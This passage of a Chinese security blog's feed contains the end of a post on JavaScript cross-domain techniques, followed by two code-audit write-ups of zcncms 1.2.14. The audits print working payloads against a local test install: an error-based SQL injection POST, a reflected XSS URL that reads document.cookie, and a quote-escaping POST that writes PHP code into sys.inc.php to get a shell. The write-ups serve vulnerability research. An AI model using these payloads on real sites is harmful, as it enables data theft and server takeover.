<p>由于两个页面不在同一个域下,IE、Chrome不允许修改parent.location.hash的值,所以要借助于a.com域名下的一个代理iframe,这里有一个a.com下的代理文件c.html。Firefox可以修改。<br>c.html代码如下:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="undefined">parent.parent.location.hash = self.location.hash.substring(1); </span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<p>直接访问a.html,a.html向b.html发送的消息为”sayHi”;b.html通过消息判断返回了”HiWorld”,并通过c.html改变了location.hash的值<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2ao3jXNeK.eBjSZFlXXaywXXa_!!792076116.png" alt=""></p>
<h3 id="8-flash-URLLoader"><a href="#8-flash-URLLoader" class="headerlink" title="8. flash URLLoader"></a>8. flash URLLoader</h3><p>flash有自己的一套安全策略,服务器可以通过crossdomain.xml文件来声明能被哪些域的SWF文件访问,SWF也可以通过API来确定自身能被哪些域的SWF加载。当跨域访问资源时,例如从域baidu.com请求域google.com上的数据,我们可以借助flash来发送HTTP请求。首先,修改域google.com上的crossdomain.xml(一般存放在根目录,如果没有需要手动创建) ,把baidu.com加入到白名单。其次,通过Flash URLLoader发送HTTP请求,最后,通过Flash API把响应结果传递给JavaScript。Flash URLLoader是一种很普遍的跨域解决方案,不过需要支持iOS的话,这个方案就不可行了。</p>
<h4 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h4><p>总的来说,常见的跨域方法如上述。在不同的业务场景下,各有适合的跨域方式。跨域解决了一些资源共享、信息交互的难题,但是有的跨域方式可能会带来安全问题,如jsonp可导致水坑攻击,<code><img></code>等标签会被用来进行xss或csrf攻击。所以,在应用跨域的场景,需要格外注意安全问题。</p>
]]></content>
<summary type="html">
<p>最近面试问的挺多的一个问题,就是JavaScript的跨域问题。在这里,对跨域的一些方法做个总结。由于浏览器的同源策略,不同域名、不同端口、不同协议都会构成跨域;但在实际的业务中,很多场景需要进行跨域传递信息,这样就催生出多种跨域方法。<br>
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="javascript" scheme="http://wps2015.org/tags/javascript/"/>
</entry>
<entry>
<title>代码审计——zcncms几处漏洞合集(二)</title>
<link href="http://wps2015.org/2016/08/09/code-audit-of-zcncms2/"/>
<id>http://wps2015.org/2016/08/09/code-audit-of-zcncms2/</id>
<published>2016-08-08T16:00:00.000Z</published>
<updated>2016-08-10T06:49:42.416Z</updated>
<content type="html"><![CDATA[<p>接上一篇 <a href="http://wps2015.org/2016/08/05/code%20audit%20of%20zcncms/">代码审计——zcncms后台SQL注入(一)</a>, 继续挖掘出zcncms的几处漏洞.<a id="more"></a></p>
<h4 id="后台SQL注入"><a href="#后台SQL注入" class="headerlink" title="后台SQL注入"></a>后台SQL注入</h4><p>继上一篇参数$parentid未正确处理后,在/module/products/admincontroller/products_photo.php中,<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">switch</span>($a)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'list'</span>:<span class="keyword">default</span>:<span class="comment">//list</span></span><br><span class="line"> <span class="comment">//列表</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">empty</span>($productid)) {</span><br><span class="line"> $where = <span class="string">' 1 = 1 '</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $where = <span class="string">" productid = '"</span>.$productid.<span class="string">"' "</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> $pageListNum=<span class="number">12</span>;<span class="comment">//每页显示</span></span><br><span class="line"> $totalPage=<span class="number">0</span>;<span class="comment">//总页数</span></span><br><span class="line">----------------------------------------------------------------------</span><br><span class="line"><span class="keyword">case</span> <span class="string">'edit'</span>:<span class="comment">//</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>($submit)){</span><br><span class="line"> $info = <span class="keyword">array</span>();</span><br><span class="line"> $time = time();</span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>($id)){</span><br><span class="line"> $id = intval($id);</span><br><span class="line"> <span class="keyword">if</span>($id <= <span class="number">0</span>){</span><br><span class="line"> errorinfo(<span class="string">'变量错误'</span>,<span class="string">''</span>);</span><br><span class="line"> }</span><br><span class="line"> $infoold = $products_photo->GetInfo(<span class="string">''</span>,<span class="string">' id = '</span>.$id); </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> $productinfo = $products->GetInfo(<span class="string">''</span>,<span class="string">' id = '</span>.$productid);</span><br><span class="line"> <span class="comment">//20120719</span></span><br><span class="line"> checkClassPower(<span class="string">'products'</span>,$productinfo[<span class="string">'classid'</span>]);</span><br></pre></td></tr></table></figure></p>
<p>当 $a的值为’list’时,<code>$where = " productid = '".$productid."' "</code>, $procuctid被单引号保护起来,参数引进是经过addslashes操作的,所以这里是安全的。但是当$a == ‘edit’时,<code>$products->GetInfo('',' id = '.$productid)</code>,$productid被直接拼接到where语句中且没有单引号保护,导致SQL注入。构造payload如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:8088/code_audit/zcncms/admin/?c=products_photo&a=edit&id=7</span><br><span class="line">POST:</span><br><span class="line">submit=&productid=12=@`\\\'` and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1));#@`\\\'`</span><br></pre></td></tr></table></figure></p>
<p><img src="https://img.alicdn.com/imgextra/i1/792076116/TB2xsvmuXXXXXcTXpXXXXXXXXXX_!!792076116.png" alt=""></p>
<h4 id="反射型xss"><a href="#反射型xss" class="headerlink" title="反射型xss"></a>反射型xss</h4><p>在后台登陆文件 /include/admincontroller/login.php中,进行登陆是否成功后,设置模板文件为’login.tpl.php’.<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">header(<span class="string">"location:./"</span>);</span><br><span class="line"><span class="keyword">exit</span>;</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"><span class="comment">//echo 1;</span></span><br><span class="line">$loginerror = <span class="string">'用户名密码错误,请重新登陆.'</span>;</span><br><span class="line">$templatefile = <span class="string">'login.tpl.php'</span>;</span><br><span class="line">}</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">$templatefile = <span class="string">'login.tpl.php'</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>跟踪到/admin/templates/default/login.tpl.php<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><meta http-equiv=<span class="string">"Content-Type"</span> content=<span class="string">"text/html; charset=utf-8"</span> /></span><br><span class="line"><title></span><br><span class="line"><span class="meta"><?php</span> <span class="keyword">if</span>(!<span class="keyword">empty</span>($topTitle)) <span class="keyword">echo</span> $topTitle.<span class="string">'-'</span>;<span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span> <span class="keyword">echo</span> $sys[<span class="string">'indextitle'</span>]; <span class="meta">?></span>-<span class="meta"><?php</span> <span class="keyword">echo</span> $pagetitle;<span class="meta">?></span></title></span><br><span class="line"><meta name=<span class="string">"keywords"</span> content=<span class="string">"<?php echo $sys['webkeywords']; ?>"</span>></span><br><span class="line"><meta name=<span class="string">"description"</span> content=<span class="string">"<?php echo $sys['webdescription']; ?>"</span>></span><br></pre></td></tr></table></figure></p>
<p>在<code><title></code>标签中要echo三个变量,其中会检查$topTitle是否为空,我们再控制器文件login.php中并未找到$topTitle的定义或初始化,由于之前参数输入特性,可以进行变量覆盖。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:8088/code_audit/zcncms/admin/?c=login&topTitle=</title><script>alert(document.cookie)</script></span><br></pre></td></tr></table></figure>
<p><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2ufnWuXXXXXbmXXXXXXXXXXXX_!!792076116.png" alt=""></p>
<h4 id="后台getshell"><a href="#后台getshell" class="headerlink" title="后台getshell"></a>后台getshell</h4><p>在文件/include/admincontroller/sys.php中<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$pagetitle = <span class="string">'基本信息'</span>;</span><br><span class="line">$pagepower = <span class="string">'sys'</span>;</span><br><span class="line"><span class="comment">//基本部分</span></span><br><span class="line"><span class="keyword">require</span>(<span class="string">'checkpower.inc.php'</span>);</span><br><span class="line"><span class="comment">//功能部分</span></span><br><span class="line"><span class="keyword">include_once</span>(WEB_INC.<span class="string">'file.class.php'</span>);</span><br><span class="line"><span class="keyword">include_once</span>(WEB_INC.<span class="string">'string.class.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($submit)){</span><br><span class="line"> $FS = <span class="keyword">new</span> files();</span><br><span class="line"> $STR = <span class="keyword">new</span> C_STRING();</span><br><span class="line"> $info = <span class="keyword">array</span>(</span><br><span class="line"> <span class="string">'isclose'</span> => $isclose,</span><br><span class="line"> <span class="string">'closeinfo'</span> => $closeinfo,</span><br><span class="line"> <span class="string">'webtitle'</span> => $webtitle,</span><br><span class="line"> <span class="string">'indextitle'</span> => $indextitle,</span><br><span class="line"> <span class="string">'webkeywords'</span> => $webkeywords,</span><br><span class="line"> <span class="string">'webdescription'</span> => $webdescription,</span><br><span class="line"> <span class="string">'webcopyright'</span> => $webcopyright,</span><br><span class="line"> <span class="string">'webbeian'</span> => $webbeian,</span><br><span class="line"> <span class="string">'systemplates'</span> => $systemplates,</span><br><span class="line"> <span class="string">'linkurlmode'</span> => $linkurlmode,</span><br><span class="line"> );</span><br><span class="line"> $rs_msg = $STR->safe($info);</span><br><span class="line"> <span class="keyword">if</span>($FS->file_Write($rs_msg, WEB_INC.<span class="string">'sys.inc.php'</span>, <span class="string">'sys'</span>)) {</span><br><span class="line"> errorInfo(<span class="string">'编辑成功'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> errorInfo();</span><br></pre></td></tr></table></figure></p>
<p>可编辑网站的基本信息并且存入sys.inc.php,<code>$rs_msg = $STR->safe($info);</code>但是$info经过了safe函数,我们跟踪safe函数<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">safe</span><span class="params">($msg)</span></span><br><span class="line"> </span>{</span><br><span class="line"> <span class="keyword">if</span>(!$msg && $msg != <span class="string">'0'</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span>(is_array($msg))</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">foreach</span>($msg <span class="keyword">AS</span> $key=>$value)</span><br><span class="line"> {</span><br><span class="line"> $msg[$key] = $this->safe($value);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> $msg = trim($msg);</span><br><span class="line"> <span class="comment">//$old = array("&amp;","&nbsp;","'",'"',"\t","\r");</span></span><br><span class="line"> <span class="comment">//$new = array("&"," ","&#39;","&quot;","&nbsp; &nbsp; ","");</span></span><br><span class="line"> $old = <span class="keyword">array</span>(<span class="string">"&amp;"</span>,<span class="string">"&nbsp;"</span>,<span class="string">"'"</span>,<span class="string">'"'</span>,<span class="string">"\t"</span>);</span><br><span class="line"> $new = <span class="keyword">array</span>(<span class="string">"&"</span>,<span class="string">" "</span>,<span class="string">"&#39;"</span>,<span class="string">"&quot;"</span>,<span class="string">"&nbsp; &nbsp; "</span>);</span><br><span class="line"> $msg = str_replace($old,$new,$msg);</span><br><span class="line"> $msg = str_replace(<span class="string">" "</span>,<span class="string">"&nbsp; &nbsp;"</span>,$msg);</span><br><span class="line"> $old = <span class="keyword">array</span>(<span class="string">"/<script(.*)<\/script>/isU"</span>,<span class="string">"/<frame(.*)>/isU"</span>,<span class="string">"/<\/fram(.*)>/isU"</span>,<span class="string">"/<iframe(.*)>/isU"</span>,<span class="string">"/<\/ifram(.*)>/isU"</span>,<span class="string">"/<style(.*)<\/style>/isU"</span>);</span><br><span class="line"> $new = <span class="keyword">array</span>(<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>);</span><br><span class="line"> $msg = preg_replace($old,$new,$msg);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $msg;</span><br></pre></td></tr></table></figure></p>
<p>safe函数过滤了单双引号及常见的xss,我们再看看sys.inc.php<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$sys[<span class="string">"isclose"</span>] = <span class="string">'0'</span>;</span><br><span class="line">$sys[<span class="string">"closeinfo"</span>] = <span class="string">'comming soon'</span>;</span><br><span class="line">$sys[<span class="string">"webtitle"</span>] = <span class="string">'ZCNCMS'</span>;</span><br><span class="line">$sys[<span class="string">"indextitle"</span>] = <span class="string">'ZCNCMS专注内容'</span>;</span><br><span class="line">$sys[<span class="string">"webkeywords"</span>] = <span class="string">'ZCNCMS专注内容'</span>;</span><br><span class="line">$sys[<span class="string">"webdescription"</span>] = <span class="string">'ZCNCMS专注内容'</span>;</span><br><span class="line">$sys[<span class="string">"webcopyright"</span>] = <span class="string">'Copyright+©+1996-2012,+All+Rights+Reserved+ZCNCMS'</span>;</span><br><span class="line">$sys[<span class="string">"webbeian"</span>] = <span class="string">'ZCNCMS专注内容'</span>;</span><br><span class="line">$sys[<span class="string">"systemplates"</span>] = <span class="string">'default'</span>;</span><br><span class="line">$sys[<span class="string">"linkurlmode"</span>] = <span class="string">'0'</span>;</span><br><span class="line"></span><br><span class="line"> <span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<p>我们继续跟踪sys.php中的写函数,<code>file_Write()->_write()</code><br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//写入信息</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">_write</span><span class="params">($content,$file,$type=<span class="string">"wb"</span>)</span></span><br><span class="line"> </span>{</span><br><span class="line"> <span class="keyword">global</span> $system_time;</span><br><span class="line"> $content = stripslashes($content);</span><br><span class="line"> $handle = $this->_open($file,$type);</span><br><span class="line"> @fwrite($handle,$content);</span><br><span class="line"> <span class="keyword">unset</span>($content);</span><br><span class="line"> $this->close($handle);</span><br><span class="line"> <span class="comment">//设置文件创建的时间</span></span><br><span class="line"> $system_time = $system_time ? $system_time : time();</span><br><span class="line"> @touch($file,$system_time);</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line"> }</span><br></pre></td></tr></table></figure></p>
<p>发现经过一系列的安全处理后,写入前会进行stripslashes操作,但是之前单引号被替换了。这里想到了<code>\</code><br>我们呢可以这样构造<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:8088/code_audit/zcncms/admin/?c=sys</span><br><span class="line">POST:</span><br><span class="line">isclose=0&closeinfo=1\&webtitle=;phpinfo();//&indextitle=ZCNCMS%E4%B8%93%E6%B3%A8%E5%86%85%E5%AE%B9&webkeywords=ZCNCMS%E4%B8%93%E6%B3%A8%E5%86%85%E5%AE%B9&webdescription=ZCNCMS%E4%B8%93%E6%B3%A8%E5%86%85%E5%AE%B9&webbeian=ZCNCMS%E4%B8%93%E6%B3%A8%E5%86%85%E5%AE%B9&webcopyright=Copyright+%C2%A9+1996-2012%2C+All+Rights+Reserved+ZCNCMS&linkurlmode=0&systemplates=default&submit=%E7%BC%96%E8%BE%91</span><br></pre></td></tr></table></figure></p>
<p>将$sys[“closeinfo”]后面的单引号转义,使之和$sys[“webtitle”]的第一个单引号闭合,这样$sys[“webtitle”]的值就摆脱了单引号,再利用注释符”//“注释掉后面的单引号,中间直接可以写shell。执行完成后sys.inc.php如下<br><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2aPrCuXXXXXbtXpXXXXXXXXXX_!!792076116.png" alt=""></p>
<p>成功getshell</p>
<p><img src="https://img.alicdn.com/imgextra/i2/792076116/TB2iFDQuXXXXXXyXpXXXXXXXXXX_!!792076116.png" alt=""></p>
]]></content>
<summary type="html">
<p>接上一篇 <a href="http://wps2015.org/2016/08/05/code%20audit%20of%20zcncms/">代码审计——zcncms后台SQL注入(一)</a>, 继续挖掘出zcncms的几处漏洞.
</summary>
<category term="代码审计" scheme="http://wps2015.org/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="php" scheme="http://wps2015.org/tags/php/"/>
</entry>
<entry>
<title>代码审计——zcncms后台SQL注入(一)</title>
<link href="http://wps2015.org/2016/08/05/code-audit-of-zcncms1/"/>
<id>http://wps2015.org/2016/08/05/code-audit-of-zcncms1/</id>
<published>2016-08-04T16:00:00.000Z</published>
<updated>2016-08-09T07:58:31.439Z</updated>
<content type="html"><![CDATA[<p>由于是后台注入,比较鸡肋,发上来供大家相互参考学习。zcncms版本1.2.14,官方网站地址:<br><a href="http://www.zcncms.com/" target="_blank" rel="external">zcncms</a><a id="more"></a></p>
<h4 id="0x01-变量处理"><a href="#0x01-变量处理" class="headerlink" title="0x01 变量处理"></a>0x01 变量处理</h4><p>文件/include/common.inc.php中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//检查和注册外部提交的变量</span></span><br><span class="line"><span class="keyword">foreach</span>($_REQUEST <span class="keyword">as</span> $_k=>$_v)</span><br><span class="line">{</span><br><span class="line"> <span class="comment">//if( strlen($_k)>0 && eregi('^(GLOBALS)',$_k) )</span></span><br><span class="line"> <span class="keyword">if</span>( strlen($_k)><span class="number">0</span> && preg_match(<span class="string">'/^(GLOBALS)/i'</span>,$_k) )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">exit</span>(<span class="string">'Request var not allow!'</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">-------------------------------------------------------------------</span><br><span class="line"><span class="comment">//foreach(Array('_GET','_POST','_COOKIE') as $_request) 取消cookie自动生成变量</span></span><br><span class="line"><span class="keyword">foreach</span>(<span class="keyword">Array</span>(<span class="string">'_GET'</span>,<span class="string">'_POST'</span>) <span class="keyword">as</span> $_request)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">foreach</span>($$_request <span class="keyword">as</span> $_k => $_v) {</span><br><span class="line"> <span class="comment">//------------------20130128校验变量名</span></span><br><span class="line"> <span class="keyword">if</span>(strstr($_k, <span class="string">'_'</span>) == $_k){</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'code:re_all'</span>;</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//可考虑增加变量检测,减少变量覆盖</span></span><br><span class="line"> <span class="comment">//--------------------------</span></span><br><span class="line"> ${$_k} = _GetRequest($_v);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>过滤变量的key是”_p”和”GLOBALS p”的形式,防止全局变量覆盖;并在函数<code>_GetRequest()</code>中进行了addslashes的操作。了解了上面的情况,那么有什么可利用的点就比较清楚了。</p>
<h4 id="0x02-未正确过滤"><a href="#0x02-未正确过滤" class="headerlink" title="0x02 未正确过滤"></a>0x02 未正确过滤</h4><p>文件/module/menus/admincontroller/menus.php<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="string">'edit'</span>:<span class="comment">//</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>($submit)){</span><br><span class="line"> $info = <span class="keyword">array</span>();</span><br><span class="line"> $time = time();</span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>($id)){</span><br><span class="line"> $id = intval($id);</span><br><span class="line"> <span class="keyword">if</span>($id <= <span class="number">0</span>){</span><br><span class="line"> errorinfo(<span class="string">'变量错误'</span>,<span class="string">''</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> $infoold = $menus->GetInfo(<span class="string">''</span>,<span class="string">' id = '</span>.$id);</span><br><span class="line"> <span class="comment">//改变分类从属判断</span></span><br><span class="line"> <span class="keyword">if</span>($parentid != $infoold[<span class="string">'parentid'</span>]) { <span class="comment">//毫无意义的比较</span></span><br><span class="line"> $List = $menus->GetList(<span class="string">''</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="string">" parentid = $id "</span>,<span class="string">''</span>); <span class="comment">//恰当的id</span></span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">empty</span>($List)) {</span><br><span class="line"> errorinfo(<span class="string">'对不起,该导航('</span>.$id.<span class="string">')下有子导航'</span>,<span class="string">''</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//分析根分类</span></span><br><span class="line"> <span class="keyword">if</span>($parentid == <span class="number">0</span>) {</span><br><span class="line"> $rootid = <span class="number">0</span>;</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> $parent = $menus->GetInfo(<span class="string">''</span>,<span class="string">' id = '</span>.$parentid); <span class="comment">//没有单引号</span></span><br></pre></td></tr></table></figure></p>
<p>在$parentid != $infoold[‘parentid’]中,用的’!=’,很明显如果我们要控制$parentid的值,这个不等式肯定成立。但是errorinfo会使程序退出,所以这里需要一个在数据库不存在的parentid,使得取出$List为空,从而进入下面的sql操作<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$parent = $menus->GetInfo('',' id = '.$parentid);</span><br></pre></td></tr></table></figure></p>
<h4 id="0x03-全局过滤(08sec-ids)"><a href="#0x03-全局过滤(08sec-ids)" class="headerlink" title="0x03 全局过滤(08sec ids)"></a>0x03 全局过滤(08sec ids)</h4><p>在进行尝试的时候,发现了sql执行居然还有过滤</p>
<p><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2wu4nuXXXXXXfXXXXXXXXXXXX_!!792076116.png" alt="test"><br>追踪sql语句执行函数,GetInfo()->Execute()->option()->SafeSql()<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">SafeSql</span><span class="params">($db_string,$querytype=<span class="string">'select'</span>)</span></span>{</span><br><span class="line"> <span class="comment">//var_dump($db_string);</span></span><br><span class="line"> <span class="comment">//完整的SQL检查</span></span><br><span class="line"> <span class="comment">//$pos = '';</span></span><br><span class="line"> <span class="comment">//$old_pos = '';</span></span><br><span class="line"> $pos = <span class="number">0</span>;</span><br><span class="line"> $old_pos = <span class="number">0</span>;</span><br><span class="line"> $clean = <span class="string">''</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">empty</span>($db_string)){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> (<span class="keyword">true</span>){ </span><br><span class="line"> $pos = strpos($db_string, <span class="string">'\''</span>, $pos + <span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span> ($pos === <span class="keyword">false</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> $clean .= substr($db_string, $old_pos, $pos - $old_pos);</span><br><span class="line"> <span class="keyword">while</span> (<span class="keyword">true</span>)</span><br><span class="line"> {</span><br><span class="line"> $pos1 = strpos($db_string, <span 